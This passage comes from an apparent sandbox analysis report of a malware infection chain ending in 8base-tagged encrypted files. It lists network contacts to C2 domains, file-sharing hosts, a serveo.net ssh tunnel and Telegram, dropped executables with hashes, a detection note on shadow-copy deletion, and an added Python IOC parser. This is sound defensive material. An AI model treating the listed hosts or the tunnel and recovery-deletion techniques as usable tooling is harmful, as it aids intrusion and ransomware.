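The threshold of three T1490 hits per tree is a choice for this example: a backup job or a disk-cleanup script may legitimately call vssadmin once, but nothing benign chains shadow-copy deletion, bcdedit recovery changes and wbadmin catalog deletion from one parent. Production rules would key on the real parent chain from Sysmon event 1 (or EDR equivalents) rather than the assumed links used here.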

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 126.22.238.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 192.240.110.104.in-addr.arpa udp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 servermlogs27.xyz udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 mksad917.xyz udp
DE 193.31.28.70:80 mksad917.xyz tcp
US 8.8.8.8:53 120.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 70.28.31.193.in-addr.arpa udp
US 8.8.8.8:53 cdn1.frocdn.ch udp
US 188.114.96.0:443 cdn1.frocdn.ch tcp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 qu.ax udp
IL 91.226.72.136:443 qu.ax tcp
IL 91.226.72.136:443 qu.ax tcp
IL 91.226.72.136:443 qu.ax tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 136.72.226.91.in-addr.arpa udp
IL 91.226.72.136:443 qu.ax tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 3.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
GB 217.145.238.175:80 217.145.238.175 tcp
FI 135.181.98.45:8888 135.181.98.45 tcp
US 8.8.8.8:53 45.98.181.135.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
FI 65.108.226.108:8080 65.108.226.108 tcp
FR 45.155.171.134:8080 45.155.171.134 tcp
US 8.8.8.8:53 108.226.108.65.in-addr.arpa udp
US 8.8.8.8:53 134.171.155.45.in-addr.arpa udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.242:443 tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 242.104.243.136.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
N/A 127.0.0.1:2936 tcp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
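The Network table mixes the resolver's reverse (in-addr.arpa) lookups, which the sandbox host issues for every IP it talks to, with the sample's own name lookups and connections, and a few rows have no Domain value at all (a connection made straight to an IP, or the loopback side of the ssh -R tunnel). The Python below is an added example, not part of the report: it parses a verbatim subset of the rows and reduces them to an IOC list of domains, endpoint hit counts, direct-to-IP contacts and non-standard ports. The classification labels are this example's own.

```python
from collections import Counter

# Subset of the report's Network table, copied verbatim (header included) so the
# example runs offline. Rows with only three columns have no Domain value on the page.
SAMPLE_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 61.66.131.45.in-addr.arpa udp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
FI 135.181.98.45:8888 135.181.98.45 tcp
DE 136.243.104.242:443 tcp
N/A 127.0.0.1:2936 tcp
NL 188.42.129.148:80 rl.ammyy.com tcp
"""

COMMON_PORTS = {80, 443}  # a first-party connection on any other port is worth a look


def parse_row(line):
    """Split one table row into its columns; returns None for lines that are not rows."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:  # Domain column empty on the page
        country, dest, proto = parts
        domain = ""
    else:
        return None
    ip, _, port = dest.rpartition(":")
    if not port.isdigit():
        return None
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def classify(row):
    """Label a row: PTR lookups are resolver noise, loopback is the tunnel's local side."""
    if row["ip"].startswith("127."):
        return "loopback"
    if row["proto"] == "udp" and row["port"] == 53:
        return "ptr-lookup" if row["domain"].endswith(".in-addr.arpa") else "dns-query"
    if not row["domain"] or row["domain"] == row["ip"]:
        return "direct-ip"  # contacted without a preceding name lookup
    return "connection"


def extract_iocs(table_text):
    """Collapse the table into domains, endpoint counts and direct-to-IP contacts."""
    domains, conns, direct, odd_ports, skipped = set(), Counter(), set(), set(), 0
    for line in table_text.splitlines()[1:]:  # drop the header row
        row = parse_row(line)
        if row is None:
            continue
        endpoint = f"{row['ip']}:{row['port']}"
        kind = classify(row)
        if kind == "ptr-lookup":
            skipped += 1
        elif kind == "dns-query":
            domains.add(row["domain"])
        elif kind == "connection":
            domains.add(row["domain"])
            conns[(endpoint, row["domain"])] += 1
        elif kind == "direct-ip":
            direct.add(endpoint)
        # loopback rows are dropped: 127.0.0.1:2936 is the local end of "ssh -R 80:127.0.0.1:2936"
        if kind in ("connection", "direct-ip") and row["port"] not in COMMON_PORTS:
            odd_ports.add(endpoint)
    return {
        "domains": sorted(domains),
        "connections": {ep: {"domain": dom, "count": n} for (ep, dom), n in conns.items()},
        "direct_ip": sorted(direct),
        "nonstandard_ports": sorted(odd_ports),
        "ptr_lookups_skipped": skipped,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

Direct-to-IP connections on ports such as 8888 and 8080 are the rows most worth blocking first: with no DNS name to rotate, they tend to be the hard-coded C2 of whichever payload made them. The shared infrastructure (8.8.8.8, ip-api.com, github.com, api.telegram.org) should be treated as context, not as block-list entries.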

Files

memory/3796-0-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/3796-1-0x0000000000C00000-0x0000000000DE6000-memory.dmp

memory/3796-2-0x00000000058B0000-0x0000000005928000-memory.dmp

memory/3796-3-0x0000000005940000-0x0000000005950000-memory.dmp

memory/3796-4-0x0000000005950000-0x00000000059B8000-memory.dmp

memory/3796-5-0x00000000059C0000-0x0000000005A0C000-memory.dmp

memory/3796-6-0x0000000005FF0000-0x0000000006594000-memory.dmp

memory/4256-7-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-10-0x0000000000400000-0x0000000000473000-memory.dmp

memory/3796-12-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/4256-11-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-13-0x0000000001040000-0x0000000001047000-memory.dmp

memory/4256-15-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-16-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-14-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-17-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4796-18-0x0000023DFC440000-0x0000023DFC443000-memory.dmp

memory/4256-19-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-20-0x0000000003B50000-0x0000000003B86000-memory.dmp

memory/4256-26-0x0000000003B50000-0x0000000003B86000-memory.dmp

memory/4256-27-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4256-28-0x0000000000400000-0x0000000000473000-memory.dmp

memory/4256-29-0x0000000002DD0000-0x00000000031D0000-memory.dmp

memory/4796-30-0x0000023DFC440000-0x0000023DFC443000-memory.dmp

memory/4796-31-0x0000023DFC800000-0x0000023DFC807000-memory.dmp

memory/4796-33-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-32-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-34-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-35-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-36-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-38-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-40-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-41-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-42-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-43-0x00007FF9F8BF0000-0x00007FF9F8DE5000-memory.dmp

memory/4796-44-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-45-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-46-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-47-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-48-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-49-0x00007FF4E78A0000-0x00007FF4E79CF000-memory.dmp

memory/4796-50-0x00007FF9F8BF0000-0x00007FF9F8DE5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe

MD5 a6ab201ae407fbe4a5da5f20dc38412b
SHA1 b3f8caf67f36730ad87031d206db91c861980615
SHA256 9d163fbffc9692a3143362c51d35d5ab52d1f209d9d5e053196c79a30e6f7acf
SHA512 eb0e97119784d4f60ac5b1c499e4bdfa885243c8859d79e92e1c07a2aba3539606e5df978d8d63d7764fe898e691488a53d02fc495dc837b930cfe3d83cede2b

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe (written again; hashes identical to the first entry above)

memory/1508-54-0x0000000000960000-0x0000000000B12000-memory.dmp

memory/1508-55-0x0000000074940000-0x00000000750F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe

MD5 1611ddc5ba7af4c5f4c247c178ccdbb3
SHA1 4be33b42d1def3b0fc027b72efe233b6e05007e5
SHA256 c40a4e9ac9b6cefbfdabd59a314fae01b7fcd0b91e0a7cd8b02afd105a234eb0
SHA512 6d1319e6f8db72bc50e8b77ac470ac1b42e2f34455604b651d1c50f14ad8464cf98feafb4b86f416155980aff9a353a3b6edac944cefa73ebc61b63f5718e0e5

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe (written again; hashes identical to the first entry above)

memory/1508-60-0x0000000002D80000-0x0000000002DC6000-memory.dmp

memory/3176-59-0x0000000000A30000-0x0000000000BDE000-memory.dmp

memory/3176-62-0x0000000005500000-0x0000000005544000-memory.dmp

memory/3176-63-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/3176-65-0x0000000005570000-0x00000000055A2000-memory.dmp

memory/1508-66-0x0000000005560000-0x0000000005570000-memory.dmp

memory/3176-64-0x00000000055C0000-0x00000000055D0000-memory.dmp

memory/3548-68-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe (written again; hashes identical to the first entry above)

memory/1508-74-0x0000000074940000-0x00000000750F0000-memory.dmp

memory/212-76-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3548-77-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-78-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3176-75-0x0000000074940000-0x00000000750F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe (written again; hashes identical to the first entry above)

memory/212-67-0x0000000000400000-0x000000000040B000-memory.dmp

memory/1508-61-0x00000000054B0000-0x00000000054E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe (written again; hashes identical to the first entry above)

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n6)ZqKc3{.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

memory/1516-81-0x00000000749E0000-0x0000000075190000-memory.dmp

memory/1516-82-0x0000000005220000-0x0000000005230000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe (written again; hashes identical to the first entry above)

memory/1516-87-0x00000000749E0000-0x0000000075190000-memory.dmp

memory/2184-88-0x0000000000400000-0x0000000000413000-memory.dmp

memory/4796-89-0x0000023DFC800000-0x0000023DFC805000-memory.dmp

memory/4796-90-0x00007FF9F8BF0000-0x00007FF9F8DE5000-memory.dmp

memory/3196-91-0x00000000025A0000-0x00000000025B6000-memory.dmp

memory/212-92-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3548-105-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-106-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-107-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-109-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-112-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-116-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-115-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-120-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-173-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-177-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3548-164-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id[4FB2A4D5-3483].[[email protected]].8base

MD5 8bd844b05a901070e2621c229ae94691
SHA1 558868c8b20d6653a8ece315d2aa73fe3948e316
SHA256 3d4d86a8132e5fbd19104e9ca2123b335924fb5fbd90c022c4994122e71744f3
SHA512 969e97225509fdf8d120415cf9829d6cd89c0967a6d4993588bd466c1cf25c81855992906860ea8ae923d64cd2ea789d9f39e0ba7f38945835968099e51491ce

memory/3548-416-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2184-1747-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E45.exe (all four hashes identical to C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe above: the same binary under a second name)

MD5 a6ab201ae407fbe4a5da5f20dc38412b
SHA1 b3f8caf67f36730ad87031d206db91c861980615
SHA256 9d163fbffc9692a3143362c51d35d5ab52d1f209d9d5e053196c79a30e6f7acf
SHA512 eb0e97119784d4f60ac5b1c499e4bdfa885243c8859d79e92e1c07a2aba3539606e5df978d8d63d7764fe898e691488a53d02fc495dc837b930cfe3d83cede2b

C:\Users\Admin\AppData\Local\Temp\6E45.exe (written again; hashes identical to the entry above)

C:\Users\Admin\AppData\Local\Temp\6E45.exe (written again; hashes identical to the entry above)

memory/3756-3789-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/3756-3793-0x0000000005220000-0x0000000005230000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\705A.exe

MD5 20bb118569b859e64feaaf30227e04b8
SHA1 3fb2c608529575ad4b06770e130eb9d2d0750ed7
SHA256 c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
SHA512 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c

C:\Users\Admin\AppData\Local\Temp\705A.exe (written again; hashes identical to the entry above)

memory/1080-3875-0x0000000000030000-0x00000000000AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E45.exe (written again; hashes identical to the entry above)

C:\Users\Admin\AppData\Local\Temp\6E45.exe (written again; hashes identical to the entry above)

memory/3756-3963-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/1080-3958-0x0000000004E40000-0x0000000004EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\73A6.exe

MD5 5f0bbf0b4ce5fa0bca57f1230e660dff
SHA1 529e438c21899eff993c0871ce07aff037d7f10d
SHA256 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d
SHA512 ddede174b3aac4bbf434e1d61da8fa858b4bde11850a75b113376dccb7356f054a9fb696f498cb01c040cec33bb03d75c8c7b2787d46fc33569aeb753ee16131

C:\Users\Admin\AppData\Local\Temp\73A6.exe (written again; hashes identical to the entry above)

memory/5000-4011-0x0000000000E40000-0x0000000000E54000-memory.dmp

memory/5000-4025-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/4004-3985-0x0000000000400000-0x0000000000413000-memory.dmp

memory/5000-4076-0x0000000005850000-0x0000000005860000-memory.dmp

memory/5092-4182-0x0000000000BF0000-0x0000000000C04000-memory.dmp

memory/1080-4177-0x0000000005CB0000-0x0000000005CC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\75DA.exe

MD5 4345b942eb187e2b867a6e9524d166e0
SHA1 1814c6a4205852069bbaaf9c8bd2809842d52548
SHA256 0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c
SHA512 85f5ecafcb711af6ace4ddb11ca3a8e8d2a4799ba07d258bb731d55dc36614139db760aeea6e1f1d3674bb045230ba9d247c13d895a7f3f85ea26967788a87d6

C:\Users\Admin\AppData\Local\Temp\75DA.exe (written again; hashes identical to the entry above)

memory/1080-4228-0x0000000005BD0000-0x0000000005C12000-memory.dmp

memory/5092-4233-0x0000000074820000-0x0000000074FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\781D.exe (all four hashes identical to C:\Users\Admin\AppData\Local\Temp\75DA.exe above: the same binary under a second name)

MD5 4345b942eb187e2b867a6e9524d166e0
SHA1 1814c6a4205852069bbaaf9c8bd2809842d52548
SHA256 0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c
SHA512 85f5ecafcb711af6ace4ddb11ca3a8e8d2a4799ba07d258bb731d55dc36614139db760aeea6e1f1d3674bb045230ba9d247c13d895a7f3f85ea26967788a87d6

memory/5092-4269-0x0000000005640000-0x0000000005650000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\781D.exe (written again; hashes identical to the entry above)

memory/1080-3941-0x0000000004D00000-0x0000000004D92000-memory.dmp

memory/1080-3874-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/4480-4281-0x0000000074820000-0x0000000074FD0000-memory.dmp

memory/1080-4294-0x0000000005C90000-0x0000000005C9A000-memory.dmp

memory/4480-4308-0x0000000005200000-0x0000000005210000-memory.dmp

memory/4480-4418-0x0000000006500000-0x000000000657C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8405.exe

MD5 400261992d812b24ecd3bfe79700443c
SHA1 f4f0d341cc860f046b2713939c70da32944f7eda
SHA256 222a5af34881bb68ffc370491a0f8d67b550cd368c49927715946365bbe8038f
SHA512 ed25f5d636658f629625614a95d4bc7a999b10cb2689c38159afa5ff24afd5136119500d00ebe83d880702f9b8e560fb570d92199f56e865eccca9695b8582f9

C:\Users\Admin\AppData\Local\Temp\8405.exe (written again; hashes identical to the entry above)

C:\Users\Admin\AppData\Local\Temp\Ynigope.exe

MD5 695069cac77763a345f1d32305a8c7ce
SHA1 509b592b750bd4f33392b3090494ea96ea966b4c
SHA256 514f00e1db1e1c5e797369e4e422b531e6d9ea2fbeb594cc33f571718037773e
SHA512 7cb60c8d9c6d3ed80e0c6bc902f8ea9243b29a945132c6a648f98ccac07674193c522679dc03fb8708262af000d0da6bf06a7c5e0a76b3946306e475ec3f9dd0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ddwqx74p.default-release\cookies.sqlite.id[4FB2A4D5-3483].[[email protected]].8base

MD5 077df49bbf6f9f33fcc2e3ae14d7cbff
SHA1 52e208c2555e81eb6649a70ac695619006a209cf
SHA256 3efc22511a55d7a4d6121d92763e25f1d014b7e514f25922a3aeeab00aa63eaa
SHA512 7727bb8299d532185ea5549cd84a0304a67b8552b91de5c2b26b1e75f891026643e729605ac8eaba465e80e1725acc64113a4701910fedd3f2d421b6908cb361

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

MD5 c0aed85f01118e3d67e3b2a514a7a36b
SHA1 773e349d3ccadf77c7025d0450a337c538869f14
SHA256 1c144975fd84bd986810e9067c6381939683de5e00223dad95bb7fd85e157d62
SHA512 09027ddc074a09edc7da397af8369cf2bbf8c1c68f0ecac02151ea595a2e9499775abaa40e9b51fb96a9895a4901bd29daf7b83e93cc1f1f9ac64c39c999277d

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.dll

MD5 480a66902e6e7cdafaa6711e8697ff8c
SHA1 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
SHA256 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
SHA512 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.msg

MD5 3f05819f995b4dafa1b5d55ce8d1f411
SHA1 404449b79a16bfc4f64f2fd55cd73d5d27a85d71
SHA256 7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
SHA512 34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Ynigope.exe.log

MD5 80baaa85a67fdc1a25bdd9827994bcad
SHA1 80919468e874f0281df476d1071dc8dd40187419
SHA256 41ea3f875990a0e8ff6a04d67f834422181f88ee8d3ad09fadda04dec1024a58
SHA512 38e5a4949264df20898ebbfbdc07f4ebd00ed1a50de9997b0238b9395db7e42435cc0f19b8682a3416e76d6b0e2bc42520fe79e9371f7f522ab35955f4ff9f44